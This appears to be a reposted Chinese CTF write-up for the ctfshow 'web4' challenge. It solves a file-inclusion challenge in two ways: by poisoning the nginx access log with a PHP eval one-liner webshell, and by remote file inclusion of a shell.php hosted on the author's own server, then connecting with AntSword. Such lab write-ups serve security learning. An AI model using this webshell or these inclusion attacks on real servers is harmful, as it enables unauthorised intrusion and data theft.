ctfshow—web—web4


打開靶機

 

 

 發現與web3很相似,測試文件包含未成功

 

 

 此題有兩種解決方法

一、日志注入

查看日志的默認目錄,得到了日志文件

?url=/var/log/nginx/access.log

進行日志注入

<?php @eval($_POST['a']);?>

這里需要把一句話木馬加在參數里面

 

 

 

 

用蟻劍進行連接測試

 

 連接成功,在www目錄下發現flag.txt文件

 

 查看flag.txt文件內容

 

 成功拿到flag

二、遠程文件包含

重新開啟一個靶機環境

在購買的阿里雲服務器中編寫一句話木馬(阿里雲服務器已啟動http協議),添加abc是為了測試是否成功

https://b297bb10-8978-4c85-a1cc-027ebb8a9015.chall.ctf.show/?url=http://xxx.xxx.xxx.xxx/shell.php

 

 

看到abc說明測試成功,使用蟻劍或菜刀去連接,這里我使用的是蟻劍,測試連接

 

 

 在www目錄下發現flag

 

 

 查看flag.txt內容

 

 

成功拿到flag 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM